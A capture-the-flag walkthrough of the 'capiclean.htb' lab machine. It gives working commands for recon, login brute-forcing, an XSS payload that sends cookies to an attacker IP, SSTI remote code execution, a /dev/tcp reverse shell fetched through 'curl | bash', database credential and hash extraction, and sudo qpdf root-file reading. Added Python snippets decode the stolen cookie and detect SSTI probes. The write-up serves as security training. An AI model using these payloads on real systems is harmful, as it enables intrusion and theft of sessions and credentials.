TCP Scan

> TARGET=10.129.44.91 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//') -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp

> curl http://10.129.44.91/
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="refresh" content="0;url=http://capiclean.htb">
</head>
<body>
    <!-- Optional content for users without JavaScript -->
    <p>If you are not redirected, <a href="http://capiclean.htb">click here</a>.</p>
</body>
</html>
  • add /etc/hosts entry
10.129.44.91    capiclean.htb
  • subdomain enum
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://capiclean.htb/" -H "Host: FUZZ.capiclean.htb"
[x]
  • get possible user/contact info from html
> curl http://capiclean.htb/ | html2text

***** Mary Pikes *****
Introducing Mary Pikes: a dedicated and efficient cleaner with a flair for
perfection. With Mary's meticulous attention to detail and commitment to
excellence, your space will be transformed into a pristine haven. Trust Mary to
bring a touch of sparkle to every corner, leaving you delighted with the
results.
***** Martha Smith *****
Meet Martha, your passionate cleaner who brings joy to every space she touch.
With 10 years of experience, she transforms spaces into immaculate sanctuaries,
leaving smiles in her wake.
[/static/images/img-5.png]
[/static/images/img-6.png]
***** Jasmine Summers *****
Meet Jasmine, your dedicated cleaner who takes pride in her work. With 5 years
of experience, she brings a touch of magic to every corner, creating spaces
that sparkle with cleanliness and warmth.
***** Mike Samuels *****
Meet Mike, your friendly and meticulous cleaner. With a passion for cleanliness
and an eye for detail, Mike ensures that every space he touches shines with
perfection. Trust Mike to leave your home or office spotless and inviting,
every time.
[/static/images/img-7.png]

****** Contact  [/static/images/icon-2.png] Us ******
[/static/images/map-icon.png]Locations
[/static/images/call-icon.png]+12_345678901234
[/static/images/map-icon.png]contact@capiclean.htb
  • dirsearch
> dirsearch -u http://capiclean.htb/
[10:33:04] 200 -    5KB - /about
[10:33:42] 302 -  189B  - /dashboard  ->  /
[10:34:04] 200 -    2KB - /login
[10:34:05] 302 -  189B  - /logout  ->  /
[10:34:29] 403 -  278B  - /server-status
[10:34:29] 403 -  278B  - /server-status/
[10:34:29] 200 -    2KB - /services
  • Found two endpoints that accept POST requests
POST /login HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/login
Upgrade-Insecure-Requests: 1

username=test&password=test


POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1

service=...&email=test%40test.com|id
  • try brute-forcing the login
> hydra -L /usr/share/wordlists/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt capiclean.htb http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect"

> hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt capiclean.htb http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect"
* SecLists/Passwords/Common-Credentials/10k-most-common.txt
[x]
  • try command injection on the sendMessage endpoint
> wfuzz -w /usr/share/wordlists/Auto_Wordlists/custom_wordlists/command_injection.txt -u http://capiclean.htb/sendMessage -d "service=FUZZ&email=asdf%40fdasf.com"
> wfuzz -w '/usr/share/wordlists/PayloadsAllTheThings/Server Side Template Injection/README.md' -u http://capiclean.htb/sendMessage -d "service=FUZZ&email=asdf%40fdasf.com" --hh 5048

> curl http://capiclean.htb/sendMessage -d "service=`curl 10.10.16.59`&email=asdf%40fdasf.com"
[x]
  • found XSS vulnerability
> curl http://capiclean.htb/sendMessage -d 'service='$(urlencode '<img src=x onerror=this.src="http://10.10.16.59/?c1="+btoa(document.cookie)>')'&email=test%40test.com'

10.129.43.173 - - [08/Apr/2024 11:46:16] "GET /?c1=c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoR3lSZy5ucFdnNS1yQUZoNmhqRjE2VVQ1T0pseDZRQk0= HTTP/1.1" 200 -
  • decode the exfiltrated value to get the session cookie, add it to the browser's cookies and then access http://capiclean.htb/dashboard
> echo 'c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV5TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoR3lSZy5ucFdnNS1yQUZoNmhqRjE2VVQ1T0pseDZRQk0=' | base64 -d
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM
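The stolen cookie is a Flask client-side session: signed, not encrypted, and readable via document.cookie, so the HttpOnly flag was not set on it. As an added example (not part of the original write-up, stdlib-only Python) the following parses the captured value to show what a defender must assume is visible to anyone holding the cookie: the payload, the time it was issued, and the role stored as an unsalted MD5 of a role name. The list of candidate role names is an assumption.

```python
import base64
import hashlib
import json
import zlib
from typing import Optional

# Cookie value recovered above (base64-decoded from the "c1=" parameter).
CAPTURED_COOKIE = (
    "eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ"
    ".ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM"
)


def _b64url_decode(part: str) -> bytes:
    """Decode base64url after restoring the '=' padding that itsdangerous strips."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_flask_session(cookie: str) -> dict:
    """Return the JSON payload of a Flask session cookie without checking the signature.

    Layout: [.]<payload>.<timestamp>.<signature>, each field base64url. A leading
    '.' means the payload was zlib-compressed before encoding.
    """
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    raw = _b64url_decode(payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)


def session_issued_at(cookie: str) -> int:
    """Unix time at which Flask signed the cookie (big-endian int in the 2nd field)."""
    return int.from_bytes(_b64url_decode(cookie.lstrip(".").split(".")[1]), "big")


def identify_role_hash(role_value: str, candidates=("admin", "user", "guest")) -> Optional[str]:
    """The app stores the role as an unsalted MD5 of its name; map it back if possible.

    `candidates` is an assumed list of role names, not taken from the app."""
    for name in candidates:
        if hashlib.md5(name.encode()).hexdigest() == role_value:
            return name
    return None


if __name__ == "__main__":
    data = decode_flask_session(CAPTURED_COOKIE)
    print(data, "issued at", session_issued_at(CAPTURED_COOKIE))
    print("role hash matches:", identify_role_hash(data["role"]))
```

Because the signature is never checked here, this only reads the cookie; changing the role would still require the app's secret key, which is why sensitive claims belong in a server-side session rather than in the cookie at all.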

80/tcp Admin dashboard

  • check out the QR generator, which is based on a template
  • backend is Server: Werkzeug/2.3.7 Python/3.10.12
  • try fuzzing
> wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/ssti.txt -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -u http://capiclean.htb/QRGenerator -d "invoice_id=&form_type=scannable_invoice&qr_link=FUZZ"
  • The field qr_link is vulnerable to SSTI
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link=${{7*7}}


<div class="qr-code"><img src="data:image/png;base64,$49" alt="QR Code"></div>
  • check out SSTI bypass: https://www.jianshu.com/p/a736e39c3510
  • from here onward, a Python sandbox-escape technique is needed: traverse the object tree and look for things like subprocess.Popen for RCE
# traverse through __class__.__mro__.__subclasses__ and look for subprocess.Popen
> curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()}}' | grep base64

# get output from subprocess
> curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365](["ls"],stdout=-1).communicate()}}' | grep base64

> echo -e $(curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365](["ls","-la","/"],stdout=-1).communicate()}}' | grep base64)

<div class="qr-code-container"><div class="qr-code"><img src="data:image/png;base64,$(b&#39;total 76
drwxr-xr-x 18 root root 4096 Sep 27 2023 .
drwxr-xr-x 18 root root 4096 Sep 27 2023 ..
lrwxrwxrwx 1 root root 7 Aug 10 2023 bin -&gt; usr/bin
drwxr-xr-x 4 root root 4096 Apr 2 10:33 boot
drwxr-xr-x 20 root root 4020 Apr 6 20:33 dev
drwxr-xr-x 112 root root 4096 Apr 2 10:33 etc
drwxr-xr-x 3 root root 4096 Sep 5 2023 home
lrwxrwxrwx 1 root root 7 Aug 10 2023 lib -&gt; usr/lib
lrwxrwxrwx 1 root root 9 Aug 10 2023 lib32 -&gt; usr/lib32
lrwxrwxrwx 1 root root 9 Aug 10 2023 lib64 -&gt; usr/lib64
lrwxrwxrwx 1 root root 10 Aug 10 2023 libx32 -&gt; usr/libx32
drwx------ 2 root root 16384 Sep 5 2023 lost+found
drwxr-xr-x 2 root root 4096 Aug 10 2023 media
drwxr-xr-x 2 root root 4096 Aug 10 2023 mnt
drwxr-xr-x 3 root root 4096 Sep 21 2023 opt
dr-xr-xr-x 306 root root 0 Apr 6 20:33 proc
drwx------ 8 root root 4096 Apr 6 20:33 root
drwxr-xr-x 31 root root 860 Apr 7 04:46 run
lrwxrwxrwx 1 root root 8 Aug 10 2023 sbin -&gt; usr/sbin
drwxr-xr-x 2 root root 4096 Aug 10 2023 srv
dr-xr-xr-x 13 root root 0 Apr 6 20:33 sys
drwxrwxrwt 20 root root 12288 Apr 8 00:29 tmp
drwxr-xr-x 14 root root 4096 Aug 10 2023 usr
drwxr-xr-x 13 root root 4096 Sep 27 2023 var
&#39;, None)" alt="QR Code"></div>
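The qr_link value above ends up inside a template, so the fix is to stop treating it as template text at all. As an added example (not the app's own code, stdlib-only Python), the following validates qr_link as the URL the QR generator actually needs and runs the same check over submitted values to surface probes like the ones above; the sample submissions and the 10.10.14.2 address are constructed.

```python
import re
from urllib.parse import urlsplit

# Template-expression markers (Jinja2/Mako style) plus the dunder chain used in
# the probes above, both plain and in the "\x5f"-escaped form.
SSTI_MARKERS = re.compile(
    r"\{\{|\}\}|\{%|\$\{|__class__|__mro__|__subclasses__|__globals__|\\x5f",
    re.IGNORECASE,
)


def validate_qr_link(value: str) -> bool:
    """Accept only an absolute http(s) URL with a host and no template syntax.

    The QR generator only needs a link to encode, so anything else is rejected
    before it can reach a template engine.
    """
    if len(value) > 2048 or SSTI_MARKERS.search(value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


# Constructed form submissions (source IP, qr_link value) modelled on the
# requests shown above; an app-level audit log or WAF would hold these.
SAMPLE_SUBMISSIONS = [
    ("10.10.14.2", "http://capiclean.htb/invoice/42"),
    ("10.10.16.59", "${{7*7}}"),
    ("10.10.16.59", '${{""["\\x5f\\x5fclass\\x5f\\x5f"]["\\x5f\\x5fmro\\x5f\\x5f"][1]["\\x5f\\x5fsubclasses\\x5f\\x5f"]()}}'),
    ("10.10.14.2", "https://capiclean.htb/quote?id=7"),
]


def find_ssti_probes(submissions) -> list:
    """Return (source, value) for every submission whose qr_link fails validation."""
    return [(src, value) for src, value in submissions if not validate_qr_link(value)]


def probes_per_source(submissions) -> dict:
    """Count rejected submissions per source address (input for an alert threshold)."""
    counts: dict = {}
    for src, _ in find_ssti_probes(submissions):
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    for src, value in find_ssti_probes(SAMPLE_SUBMISSIONS):
        print(f"rejected qr_link from {src}: {value[:60]}")
    print(probes_per_source(SAMPLE_SUBMISSIONS))
```

Rendering the validated link as a template variable (never by concatenating it into the template source) is the other half of the fix; the marker check is defence in depth and detection input, not a substitute for that.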

foothold

  • create and serve the reverse shell script s.sh
#!/usr/bin/bash
bash -i >& /dev/tcp/10.10.16.59/4444 0>&1
  • trigger the shell
> echo -e $(curl http://capiclean.htb/QRGenerator -H "Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhGyRg.npWg5-rAFh6hjF16UT5OJlx6QBM" -d 'invoice_id=&form_type=scannable_invoice&qr_link=${{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365]("curl http://10.10.16.59/s.sh|bash",shell=True,stdout=-1).communicate()}}' | grep base64)
  • check app.py, found DB password
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}
  • local enum
www-data@iclean:/opt/app$ ls /home
consuela

www-data@iclean:/opt/app$ mysql -uiclean -D capiclean --password
Enter password: pxCsmnGLckUb
select * from users;
exit
id      username        password        role_id
1       admin   2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51        21232f297a57a5a743894a0e4a801fc3
2       consuela        0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa        ee11cbb19052e40b07aac0ca060c23ee
  • crack on https://crackstation.net/
0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean
  • log in via SSH as consuela
> ssh consuela@capiclean.htb
consuela@capiclean.htb's password:

consuela@iclean:~$ cat user.txt
3a102871afd9b53f026660931cc0e981

privilege escalation

consuela@iclean:~$ sudo -l
[sudo] password for consuela:
Matching Defaults entries for consuela on iclean:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User consuela may run the following commands on iclean:
    (ALL) /usr/bin/qpdf
# on target
> sudo qpdf --empty --add-attachment /root/root.txt --mimetype=text/plain -- a.pdf
> sudo qpdf --object-streams=disable a.pdf b.pdf

# on kali
> binwalk -Me b.pdf --run-as=root
ca05e751aa424b744ee33ad9d63bbb39

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack